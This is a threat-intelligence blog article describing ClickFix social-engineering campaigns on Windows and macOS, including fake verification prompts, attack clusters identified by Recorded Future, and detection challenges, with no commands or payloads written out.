The term ClickFix refers to a recent trend in social engineering that’s been growing, where a user is tricked in one way or another into “fixing” a supposed problem. In such cases, the “fix” that the user is trying to perform is actually executing malicious actions. ClickFix tactics, while not new, have become one of the most widely used initial access methods in the last year.
We can see some examples of how this might look below. This example shows an iClicker compromised verification page, where a user will be prompted to perform a couple of different steps to perform verification. What basically ends up happening is the user is provided with a shell script to paste into the Windows Run box, which then downloads a secondary Powershell script from a remote server.
(Source: Bleeping Computer)
As we can see, victims of these attacks will typically be presented with convincing prompts, like a fake CAPTCHA, browser error, or some sort of security warning. These will be followed by a set of instructions prompting them to do a variety of things like pasting code into a terminal, download a file, etc. It is these actions that then initiate malicious actions like payload downloading, credential harvesting, or establishing remote access.
The trouble with ClickFix attacks is that they do not rely on software vulnerabilities. Instead, they take a social engineering approach of exploiting user trust and familiar patterns like having to perform an annoying action to provide verification. These kinds of user-assisted attacks can be highly scalable, especially in the case of infostealer propagation, since leveraging information gained in those cases can then be used to do secondary damage.
ClickFix attacks are becoming popular for targeting both Windows and MacOS environments. One of the more notable developments with ClickFix is Apple’s recent security update to their Terminal application, which specifically targets this kind of attack by warning users when they are attempting to paste potentially dangerous commands into the terminal. We can see an example of that below.
(Source: Risky Business)
Unfortunately, there are several other ClickFix campaigns targeting macOS environments, such as those intending to deliver other infostealers like MacSync. Sometimes these payloads are disguised as developer tools or AI-related software, with malicious installation pages being hosted on otherwise legitimate platforms like Cloudflare Pages or Squarespace.
On the Windows side of things, ClickFix attacks are seen to have evolved in their execution. Previously, campaigns have relied on having the user paste shell instructions into the Windows Run dialog, as we mentioned a moment ago, but now campaigns appear to be directing users to use the Windows Terminal instead. ClickFix tactics are also being used in a new campaign to distribute a previously undocumented malware loader known as DeepLoad.
To make matters feel a little worse, the Insikt Group at Recorded Future has identified 5 different clusters of ClickFix activity based on their patterns and target approaches. The Quickbooks group uses targeted impersonation of accounting software, the booking.com group uses fraudulent domains to fake verification portals, the Birdeye group directly targets users of the Birdeye AI marketing company, the Dual-Platform group uses OS detection to deliver platform specific payloads, and macOS storage group uses prompts mimicking macOS system optimization tools.
One prevalent takeaway one can see with the rise of ClickFix attacks is an apparent evolution in how attackers aim to achieve initial access. This is clear given that user-assisted methods now often outperform traditional exploit-dependent approaches. And what's more, one might also see the user-assisted approach as potentially more reliable since they only rely on legitimate tools and user-approved actions.
ClickFix attacks also show cross platform adaptability, particularly in cases where campaigns belong to the dual platform group we mentioned earlier and tailor specific actions to whatever operating system is currently being used.
As far as detection is concerned, it's important to understand that copy-and-paste methods for command execution introduce new challenges, since proper context will be required in order to distinguish malicious actions from legitimate user behavior.
Ultimately, ClickFix attacks take the social engineering angle more seriously than some other types of attacks in the sense that campaigns are designed to require minimal technical sophistication yet yield relatively high success rates because they are instead leveraging human behavior.
This article is shared at no charge for educational and informational purposes only.
Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization. We provide indicators-of-compromise information via a notification service (RedXray) or an analysis service (CTAC). For questions, comments, or assistance, please contact the office directly at 1-844-492-7225 or feedback@redskyalliance.com
- Reporting: https://www.redskyalliance.org/
- Website: https://www.redskyalliance.com/
- LinkedIn: https://www.linkedin.com/company/64265941
Weekly Cyber Intelligence Briefings:
REDSHORTS - Weekly Cyber Intelligence Briefings
https://register.gotowebinar.com/register/5207428251321676122
[2]: https://www.triskelelabs.com/clickfix-malware-fake-captcha-malware-campaign-overview
[3]: https://thehackernews.com/2026/03/deepload-malware-uses-clickfix-and-wmi.html
[4]: https://www.recordedfuture.com/research/clickfix-campaigns-targeting-windows-and-macos
[5]: https://news.risky.biz/risky-bulletin-apple-adds-clickfix-warning-to-macos-terminal
Comments